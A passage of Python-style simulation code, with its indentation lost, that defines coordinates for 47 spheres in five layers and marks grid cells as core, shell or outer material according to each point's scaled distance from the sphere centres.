zz20=((1+sqrt(3.0))*radiusc/dl-k+1)
xx21=((7)*radiusc/dl-i+1)
yy21= ((7)*radiusc/dl-j+1)
zz21=((1+sqrt(3.0))*radiusc/dl-k+1)
xx22=((6)*radiusc/dl-i+1)
yy22= ((8+sqrt(2.0)/2)*radiusc/dl-j+1)
zz22=((1+sqrt(3.0))*radiusc/dl-k+1)
xx23=((6)*radiusc/dl-i+1)
yy23= ((6-sqrt(2.0)/2)*radiusc/dl-j+1)
zz23=((1+sqrt(3.0))*radiusc/dl-k+1)
xx24=((3.0)*radiusc/dl-i+1)
yy24= ((7)*radiusc/dl-j+1)
zz24=((1+sqrt(3.0))*radiusc/dl-k+1)
xx25=(9*radiusc/dl-i+1)
yy25= (7*radiusc/dl-j+1)
zz25=((1+sqrt(3.0))*radiusc/dl-k+1)
xx26=((8)*radiusc/dl-i+1)
yy26= ((8+sqrt(2.0)/2)*radiusc/dl-j+1)
zz26=((1+sqrt(3.0))*radiusc/dl-k+1)
xx27=((4)*radiusc/dl-i+1)
yy27= ((8+sqrt(2.0)/2)*radiusc/dl-j+1)
zz27=((1+sqrt(3.0))*radiusc/dl-k+1)
xx28=((8.0)*radiusc/dl-i+1)
yy28= ((6.0-sqrt(2.0)/2)*radiusc/dl-j+1)
zz28=((1+sqrt(3.0))*radiusc/dl-k+1)
xx29=((4.0)*radiusc/dl-i+1)
yy29= ((6.0-sqrt(2.0)/2)*radiusc/dl-j+1)
zz29=((1+sqrt(3.0))*radiusc/dl-k+1)
xx30=((5)*radiusc/dl-i+1)
yy30= ((8+sqrt(2.0)/2+sqrt(3.0))*radiusc/dl-j+1)
zz30=((1+sqrt(3.0))*radiusc/dl-k+1)
xx31=((7.0)*radiusc/dl-i+1)
yy31= ((8.0+sqrt(2.0)/2+sqrt(3.0))*radiusc/dl-j+1)
zz31=((1+sqrt(3.0))*radiusc/dl-k+1)
xx32=((5)*radiusc/dl-i+1)
yy32= ((6-sqrt(2.0)/2-sqrt(3.0))*radiusc/dl-j+1)
zz32=((1+sqrt(3.0))*radiusc/dl-k+1)
xx33=((7.0)*radiusc/dl-i+1)
yy33= ((6.0-sqrt(2.0)/2-sqrt(3.0))*radiusc/dl-j+1)
zz33=((1+sqrt(3.0))*radiusc/dl-k+1)
# third layer
xx34=((4.0)*radiusc/dl-i+1)
yy34= ((7.0)*radiusc/dl-j+1)
zz34=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx35=((6)*radiusc/dl-i+1)
yy35= ((7)*radiusc/dl-j+1)
zz35=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx36=((8.0)*radiusc/dl-i+1)
yy36= ((7.0)*radiusc/dl-j+1)
zz36=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx37=((7.0)*radiusc/dl-i+1)
yy37= ((8.0+sqrt(2.0)/2)*radiusc/dl-j+1)
zz37=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx38=((5)*radiusc/dl-i+1)
yy38= ((8+sqrt(2.0)/2)*radiusc/dl-j+1)
zz38=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx39=((7.0)*radiusc/dl-i+1)
yy39= ((6.0-sqrt(2.0)/2)*radiusc/dl-j+1)
zz39=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx40=((5.0)*radiusc/dl-i+1)
yy40= ((6.0-sqrt(2.0)/2)*radiusc/dl-j+1)
zz40=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx41=((6)*radiusc/dl-i+1)
yy41= ((8+sqrt(2.0)/2+sqrt(3.0))*radiusc/dl-j+1)
zz41=((1+2*sqrt(3.0))*radiusc/dl-k+1)
xx42=((6.0)*radiusc/dl-i+1)
yy42= ((6.0-sqrt(2.0)/2-sqrt(3.0))*radiusc/dl-j+1)
zz42=((1+2*sqrt(3.0))*radiusc/dl-k+1)
# fourth layer
xx43=((5)*radiusc/dl-i+1)
yy43= ((7.0)*radiusc/dl-j+1)
zz43=((1+3*sqrt(3.0))*radiusc/dl-k+1)
xx44=((7.0)*radiusc/dl-i+1)
yy44= ((7.0)*radiusc/dl-j+1)
zz44=((1+3*sqrt(3.0))*radiusc/dl-k+1)
xx45=((6)*radiusc/dl-i+1)
yy45= ((7+sqrt(3.0))*radiusc/dl-j+1)
zz45=((1+3*sqrt(3.0))*radiusc/dl-k+1)
xx46=((6.0)*radiusc/dl-i+1)
yy46= ((7-sqrt(3.0))*radiusc/dl-j+1)
zz46=((1+3*sqrt(3.0))*radiusc/dl-k+1)
# fifth layer
xx47=((6.0)*radiusc/dl-i+1)
yy47= ((7.0)*radiusc/dl-j+1)
zz47=((1+4*sqrt(3.0))*radiusc/dl-k+1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print (xx11,yy11,zz11,3+sqrt(3.0),float(radiusc/dl))
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
# print('aqui')
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx15/(div))**2+(yy15/(div))**2+(zz15/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx16/(div))**2+(yy16/(div))**2+(zz16/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx17/(div))**2+(yy17/(div))**2+(zz17/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx18/(div))**2+(yy18/(div))**2+(zz18/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx19/(div))**2+(yy19/(div))**2+(zz19/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx20/(div))**2+(yy20/(div))**2+(zz20/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx21/(div))**2+(yy21/(div))**2+(zz21/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx22/(div))**2+(yy22/(div))**2+(zz22/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx23/(div))**2+(yy23/(div))**2+(zz23/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx24/(div))**2+(yy24/(div))**2+(zz24/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx25/(div))**2+(yy25/(div))**2+(zz25/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx26/(div))**2+(yy26/(div))**2+(zz26/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx27/(div))**2+(yy27/(div))**2+(zz27/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx28/(div))**2+(yy28/(div))**2+(zz28/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx29/(div))**2+(yy29/(div))**2+(zz29/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx30/(div))**2+(yy30/(div))**2+(zz30/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx31/(div))**2+(yy31/(div))**2+(zz31/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx32/(div))**2+(yy32/(div))**2+(zz32/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx33/(div))**2+(yy33/(div))**2+(zz33/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx34/(div))**2+(yy34/(div))**2+(zz34/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx35/(div))**2+(yy35/(div))**2+(zz35/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx36/(div))**2+(yy36/(div))**2+(zz36/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx37/(div))**2+(yy37/(div))**2+(zz37/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx38/(div))**2+(yy38/(div))**2+(zz38/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx39/(div))**2+(yy39/(div))**2+(zz39/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx40/(div))**2+(yy40/(div))**2+(zz40/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx41/(div))**2+(yy41/(div))**2+(zz41/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx42/(div))**2+(yy42/(div))**2+(zz42/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx43/(div))**2+(yy43/(div))**2+(zz43/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx44/(div))**2+(yy44/(div))**2+(zz44/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx45/(div))**2+(yy45/(div))**2+(zz45/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx46/(div))**2+(yy46/(div))**2+(zz46/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx47/(div))**2+(yy47/(div))**2+(zz47/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
